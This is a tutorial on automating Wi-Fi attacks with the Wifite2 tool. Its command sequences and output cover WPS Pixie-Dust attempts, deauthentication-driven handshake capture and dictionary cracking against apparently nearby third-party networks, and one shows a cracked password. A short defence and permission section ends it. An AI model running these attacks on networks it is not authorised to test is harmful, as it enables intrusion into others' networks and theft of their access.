The document discusses the Wifite2 tool for automating Wi-Fi hacking. Wifite2 scans for nearby Wi-Fi networks, determines the best attacks to use against each network based on its encryption and settings, and rapidly cycles through the attacks. This allows Wifite2 to crack networks much faster than the original Wifite tool. The document provides instructions for installing Wifite2 and using it to perform a site survey, examine target networks, and launch automated attacks against selected targets.

HOW TO Automate Wi-Fi Hacking with Wifite2

There are many ways to attack a Wi-Fi network. The type of encryption, manufacturer
settings, and the number of clients connected all dictate how easy a target is to attack and
what method would work best. Wifite2 is a powerful tool that automates Wi-Fi hacking,
allowing you to select targets in range and let the script choose the best strategy for each
network.

Wifite2 vs. Wifite


Wifite has been around for some time and was one of the first Wi-Fi hacking tools I was
introduced to. Along with Besside-ng, automated Wi-Fi hacking scripts enabled even script
kiddies to have a significant effect without knowing much about the way the script worked.
Compared to Besside-ng, the original Wifite was very thorough in using all available tools to
attack a network, but it could also be very slow.

One of the best features of the original Wifite was the fact that it performed a Wi-Fi site
survey before attacking nearby networks, allowing a hacker to easily designate one, some, or
all nearby networks as targets. By laying out available targets in an easy to understand
format, even a beginner could understand what attacks might work best against nearby
networks.


The original Wifite would automatically attack WPA networks by attempting to capture a
handshake or by using the Reaver tool to brute-force the WPS setup PIN of nearby networks.
While this method was effective, it could prove to take 8 hours or more to complete.

The updated WiFite2 is much faster, churning through attacks in less time and relying on
more refined tactics than the previous version. Because of this, Wifite2 is a more serious and
powerful Wi-Fi hacking tool than the original Wifite.

Attack Flow for Wi-Fi Hacking


Wifite2 follows a simple but effective workflow for hacking nearby networks as rapidly as
possible. To do so, it pushes each tactic it tries to the practical limit, even going so far as to
try to crack any handshakes it retrieves.

In the first step, Wifite2 scans across all channels looking for any network in range. It ranks
these networks it discovers by signal strength, as a network being detected does not ensure
you can reliably communicate with it.

Organized from strongest to weakest signal strength, the reconnaissance phase involves
gathering information about what networks are around and which hacking techniques they
might be vulnerable to. Because of the way Wifite2 is organized, it's easy to add a directional
Wi-Fi antenna to use Wifite2 to locate the source of any nearby Wi-Fi network while
performing a site survey.


After the site survey is complete, any targets displayed will show whether there are clients
connected, whether the network advertises WPS, and what kind of encryption the network is
using. Based on this, an attacker can select any target, a group of targets, or all targets to
begin an attack based on the information gathered.

Wifite2 will progress through the target list starting with fastest and easiest attacks,
like WPS-Pixie, which can result in a password being breached in seconds, on to less sure
tactics like checking for weak passwords with a dictionary attack. If an attack fails or takes
too long, Wifite2 will move on to the next applicable attack without wasting hours like its
predecessor was prone to doing.

What You'll Need


To get started, you'll need a Wi-Fi network adapter you can put into wireless monitor mode.
This means selecting one that is compatible with Kali Linux, which we have several excellent
guides on doing.

Wifite2 is installed by default on Kali Linux, so I recommend you either use Kali in a virtual
machine or dual-booted on a laptop. You can use Wifite2 on other Linux systems, but I won't
go through the installation as this guide assumes you're using Kali Linux.


Step 1: Install Wifite2


If you don't have Wifite2 installed on your system already, you can do so from the GitHub
repository. First, you can clone the repository by opening a terminal window and typing the
following commands.

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install

This should download and install Wifite2 on your system. To test if it worked, you can
type wifite -h to see information about the version installed.

wifite -h

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

optional arguments:
-h, --help show this help message and exit

SETTINGS:
-v, --verbose Shows more options (-h -v). Prints commands and
outputs. (default: quiet)
-i [interface] Wireless interface to use (default: choose first or
ask)
-c [channel] Wireless channel to scan (default: all channels)
-mac, --random-mac Randomize wireless card MAC address (default: off)
-p [scantime] Pillage: Attack all targets after scantime seconds
--kill Kill processes that conflict with Airmon/Airodump
(default: off)
--clients-only, -co Only show targets that have associated clients
(default: off)
--nodeauths Passive mode: Never deauthenticates clients
(default: deauth targets)

WEP:
--wep Filter to display only WEP-encrypted networks
(default: off)
--require-fakeauth Fails attacks if fake-auth fails (default: off)
--keep-ivs Retain .IVS files and reuse when cracking (default:
off)

WPA:
--wpa Filter to display only WPA-encrypted networks
(includes WPS)
--new-hs Captures new handshakes, ignores existing handshakes
in ./hs (default: off)
--dict [file] File containing passwords for cracking (default:
/usr/share/wordlists/fern-wifi/common.txt)

WPS:
--wps Filter to display only WPS-enabled networks
--bully Use bully instead of reaver for WPS attacks
(default: reaver)
--no-wps NEVER use WPS attacks (Pixie-Dust) on non-WEP
networks (default: off)
--wps-only ALWAYS use WPS attacks (Pixie-Dust) on non-WEP
networks (default: off)

EVIL TWIN:
-ev, --eviltwin Use the "Evil Twin" attack against all targets
(default: off)

COMMANDS:
--cracked Display previously-cracked access points
--check [file] Check a .cap file (or all hs/*.cap files) for WPA
handshakes
--crack Show commands to crack a captured handshake

Step 2: Plug in Your Wi-Fi Card


With Wifite2 installed on your system, you'll need to plug in your Kali Linux-compatible
wireless network adapter. Wifite2 takes care of not only auto-selecting a wireless network
adapter to use but also puts that wireless card into monitor mode for you, meaning you don't
need to do anything after plugging in the adapter.

Step 3: Set Flags & Find a Target


If we know what channel we're attacking on, we can select it by adding the -c flag
followed by the channel number. Other than that, running Wifite2 is as simple as
typing wifite and letting the script gather information.

wifite -c 11

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: scanning for targets on channel 11

[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 13595)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)
[+] looking for wireless interfaces

Interface PHY Driver Chipset
-----------------------------------------------------------------------
1. wlan0 phy3 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

[+] enabling monitor mode on wlan0... enabled wlan0mon

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 Suicidegirls 11 WPA 48db no
2 Bourgeois Pig Guest 11 WPA 45db no
3 BPnet 11 WPA 42db no
4 DirtyLittleBirdyFeet 11 WPA 32db no 5
5 ATT73qDwuI 11 WPA 32db yes
6 SpanishWiFi 11 WPA 24db no
7 Franklin Lower 11 WPA 20db no 3
8 Sonos 11 WPA 11db no
9 Villa Carlotta 11 WPA 11db no
10 Sonos 11 WPA 10db no
[+] select target(s) (1-10) separated by commas, dashes or all:

Here, we executed a scan on channel 11 and found 10 different targets. Of those targets, two
have clients connected, one has WPS enabled, and all are using WPA security.

Step 4: Examine the Site Survey & Choose Targets


From our test survey, we can see that target number 5 may present the best target. While the
signal strength isn't the best, and there aren't any clients connected, we can probably get a
handshake with the new PMKID attack even if no one is connected.

If we're looking for weak passwords, the first three networks have the strongest signal
strength, while targets 4 and 7 have the best chance of scoring a quick four-way handshake to
try brute-forcing later. If we're targeting a particular network, now is when we can select it. If
we want to pick the most likely networks, we might select targets 4, 5, and 7 for the
likelihood of a fast handshake being captured and cracked, if the WPS PIN isn't cracked first.
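The triage above can be done mechanically. The following is an added example (not Wifite2's own code) that parses the survey table Wifite2 prints in Step 3 and, for an operator auditing their own networks, lists which tactics from the attack flow each network is exposed to and the one fix that removes the fastest tactic. The survey rows are constructed from the output above; the tactic order encodes the workflow as this guide describes it, not Wifite2's source.

```python
import re
from dataclasses import dataclass

# Constructed sample in the table format Wifite2 prints in Step 3.
# ESSIDs may contain spaces, so rows are parsed from the fixed columns on the right.
SURVEY = """\
NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 Suicidegirls 11 WPA 48db no
2 Bourgeois Pig Guest 11 WPA 45db no
4 DirtyLittleBirdyFeet 11 WPA 32db no 5
5 ATT73qDwuI 11 WPA 32db yes
7 Franklin Lower 11 WPA 20db no 3
"""

ROW = re.compile(
    r"^\s*(?P<num>\d+)\s+(?P<essid>.+?)\s+(?P<ch>\d+)\s+(?P<encr>[A-Z0-9]+)"
    r"\s+(?P<power>\d+)db\s+(?P<wps>yes|no|n/a)(?:\s+(?P<clients>\d+))?\s*$"
)

@dataclass
class Target:
    num: int
    essid: str
    channel: int
    encryption: str
    power_db: int
    wps: str
    clients: int

def parse_survey(text: str) -> list[Target]:
    """Return one Target per data row; header, separator and prompt lines are skipped."""
    targets = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        targets.append(Target(int(m["num"]), m["essid"], int(m["ch"]), m["encr"],
                              int(m["power"]), m["wps"], int(m["clients"] or 0)))
    return targets

def attack_path(t: Target) -> list[str]:
    """Tactics in the order the guide describes: fastest/surest first, then
    handshake capture (PMKID when no client is attached), then dictionary."""
    if t.encryption == "WEP":
        return ["wep-ivs"]
    path = ["wps-pixie-dust"] if t.wps == "yes" else []
    if t.encryption == "WPA":
        path.append("pmkid" if t.clients == 0 else "handshake-deauth")
        path.append("dictionary")
    return path

def exposure_report(text: str) -> list[tuple[str, str, list[str]]]:
    """(essid, recommended fix, exposed tactics), strongest signal first, matching
    the defenses section: disable WPS, otherwise a long unique passphrase."""
    report = []
    for t in sorted(parse_survey(text), key=lambda t: -t.power_db):
        path = attack_path(t)
        fix = "disable WPS" if "wps-pixie-dust" in path else "use a long, unique passphrase"
        report.append((t.essid, fix, path))
    return report
```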


If we want to focus on easy targets, we can tell the script to only display targets vulnerable to
a certain kind of attack. To show only targets with WPS that might be vulnerable
to Reaver or Bully attacks, we can run Wifite2 with the -wps flag.

wifite -wps

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: targeting WPS-encrypted networks

[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)

[+] looking for wireless interfaces

Interface PHY Driver Chipset
-----------------------------------------------------------------------
1. wlan0 phy4 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

[+] enabling monitor mode on wlan0... enabled wlan0mon

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 SBG6580E8 1 WPA 45db yes
2 The Daily Planet 1 WPA 30db yes 1
3 ATT73qDwuI 11 WPA 28db yes
4 birds-Wireless 2 WPA 23db yes
[+] select target(s) (1-4) separated by commas, dashes or all:

We can do the same with -wpa or -wep to only show targets matching these types of
encryption.

Step 5: Automate Attacks by Target Type


From our results list, let's select a target with both WPS enabled and clients attached. After
selecting the number of the network we wish to attack, Wifite2 will proceed through the most
expedient attacks against the network.

[+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)

[+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
[+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1, deauth:11s, timeout:7m59s)

[+] successfully captured handshake


[+] saving copy of handshake to hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved

[+] analysis of captured handshake file:


[+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96

[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist

[!] Failed to crack handshake: common.txt did not contain password


[+] Finished attacking 1 target(s), exiting

Here, we can see that while the WPS-Pixie attack failed, we were able to easily grab and
attack a handshake. The WPS-Pixie attack timed out pretty quickly, so we wasted a minimum
of time exploring this avenue of attack. Sometimes, different wireless cards work better with
different scripts, and this is true with Reaver and Bully. If one isn't working for you, try the
other.

Wifite2 uses Reaver by default, but you can change this to Bully by using the -bully flag.

wifite -wps -bully

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: use bully instead of reaver for WPS Attacks
[+] option: targeting WPS-encrypted networks

[!] conflicting process: NetworkManager (PID 464)
[!] conflicting process: wpa_supplicant (PID 729)
[!] conflicting process: dhclient (PID 14824)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)

[+] looking for wireless interfaces
using interface wlan0mon (already in monitor mode)
you can specify the wireless interface using -i wlan0

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 SBG6580E8 1 WPA 46db yes
2 The Daily Planet 1 WPA 34db yes 1
[+] select target(s) (1-2) separated by commas, dashes or all: 2

[+] (1/1) starting attacks against 78:96:84:00:B5:B0 (The Daily Planet)

[+] The Daily Planet (44db) WPS Pixie-Dust: [4m0s] Failed: More than 100 timeouts
[+] The Daily Planet (34db) WPA Handshake capture: found existing handshake for The Daily Planet
[+] Using handshake from hs/handshake_TheDailyPlanet_78-96-84-00-B5-B0_2018-12-24T00-33-18.cap

[+] analysis of captured handshake file:


[+] tshark: .cap file contains a valid handshake for 78:96:84:00:b5:b0
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 78:96:84:00:B5:B0

[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist

[!] Failed to crack handshake: common.txt did not contain password


[+] Finished attacking 1 target(s), exiting

While we didn't have a better result with Bully, trying both is a good way of figuring out
which your wireless network adapter works best with.

Step 6: Skip & Examine Results


If Wifite2 is taking too long on any particular attack, we can always skip the current attack by
pressing Ctrl-C to bring up a menu that asks if we'd like to continue. Here, you can skip to
the next attack by pressing c, or type s to stop Wifite2.

[+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (DeAuth:Timeout) (Timeouts:15)
[!] interrupted

[+] 1 attack(s) remain, do you want to continue?
[+] type c to continue or s to stop:

If we're only able to get a four-way handshake, then we may want to add a custom dictionary
list of password guesses to try and crack the handshake. We can do this by setting the
--dict flag to the file containing passwords for cracking, the default being
/usr/share/wordlists/fern-wifi/common.txt. This password list contains many common
passwords, but you'll want to use your own if you're serious about getting results.

Below, we successfully crack a captured handshake by using a custom dictionary "passwords.txt."

wifite -wpa --dict ./passwords.txt

. .
.´ · . . · `. wifite 2.1.6
: : : (¯) : : : automated wireless auditor
`. · ` /¯\ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯\ ´

[+] option: using wordlist ./passwords.txt to crack WPA handshakes
[+] option: targeting WPA-encrypted networks

[!] conflicting process: NetworkManager (PID 419)
[!] conflicting process: wpa_supplicant (PID 585)
[!] conflicting process: dhclient (PID 7902)
[!] if you have problems: kill -9 PID or re-run wifite with --kill)

[+] looking for wireless interfaces
using interface wlan0mon (already in monitor mode)
you can specify the wireless interface using -i wlan0

NUM ESSID CH ENCR POWER WPS? CLIENT
--- ------------------------- --- ---- ----- ---- ------
1 Suicidegirls 11 WPA 58db n/a
2 Bourgeois Pig Guest 11 WPA 56db n/a
3 BPnet 11 WPA 56db n/a
4 The Daily Planet 1 WPA 49db n/a 1
5 SBG6580E8 1 WPA 49db n/a
6 Hyla Hair 2.4G 8 WPA 48db n/a
7 TWCWiFi-Passpoint 1 WPA 46db n/a
8 HP-Print-B9-Officejet... 1 WPA 40db n/a
9 birds-Wireless 2 WPA 39db n/a
10 SpanishWiFi 11 WPA 38db n/a
[!] Airodump exited unexpectedly (Code: 0) Command: airodump-ng wlan0mon -a -w /tmp/wifitei_l5H1/airodump --write-interval 1 --output-format pcap,csv
[+] select target(s) (1-10) separated by commas, dashes or all: 2

[+] (1/1) starting attacks against DE:F2:86:EC:CA:A0 (Bourgeois Pig Guest )

[+] Bourgeois Pig Guest (57db) WPA Handshake capture: Discovered new client: F0:D5:BF:BD:D5:2B
[+] Bourgeois Pig Guest (58db) WPA Handshake capture: Discovered new client: 6C:8D:C1:A8:E4:E9
[+] Bourgeois Pig Guest (59db) WPA Handshake capture: Listening. (clients:2, deauth:14s, timeout:8m1s)

[+] successfully captured handshake


[+] saving copy of handshake to hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap saved

[+] analysis of captured handshake file:


[+] tshark: .cap file contains a valid handshake for de:f2:86:ec:ca:a0
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest )
[+] aircrack: .cap file contains a valid handshake for DE:F2:86:EC:CA:A0

[+] Cracking WPA Handshake: Using aircrack-ng via passwords.txt wordlist

[+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key: christmasham)
[+] Cracked WPA Handshake PSK: christmasham

[+] Access Point Name: Bourgeois Pig Guest
[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting

By adding a good password file, we can improve our chances of cracking a Wi-Fi network
password even if the faster WPS attacks fail.

Some Practical Warnings & Defenses


Wifite2 is an example of how even script kiddies can be effective against networks with
common vulnerabilities like WPS setup PINs and weak passwords. With an increasing
amount of the more advanced attacks becoming automated, it's critical that you learn about
the most common and effective ways of attacking a Wi-Fi network.

In general, the best way to defend your network from tools like Wifite2 is to make sure you
have WPS disabled and pick a very strong password for your Wi-Fi network that you don't
share with anyone you don't need to.

It's important to note that by selecting "all" in a target list, Wifite2 will attack all of the
networks it has detected, not just the ones you have permission to attack. You must have
permission to use this tool on any network you attack, as attacking a network belonging to
someone else without permission is a crime and can get you in a lot of trouble. Saying the
script did it isn't an excuse if you're caught attacking an important network, so be sure to keep
Wifite2 targeted on networks you have permission to audit.

I hope you enjoyed this guide to automating Wi-Fi hacking with Wifite2! If you have any
questions about this tutorial on Wi-Fi hacking tools or you have a comment, feel free to write
it below in the comments or reach me on Twitter @KodyKinzie.

Cover photo by Kody/Null Byte
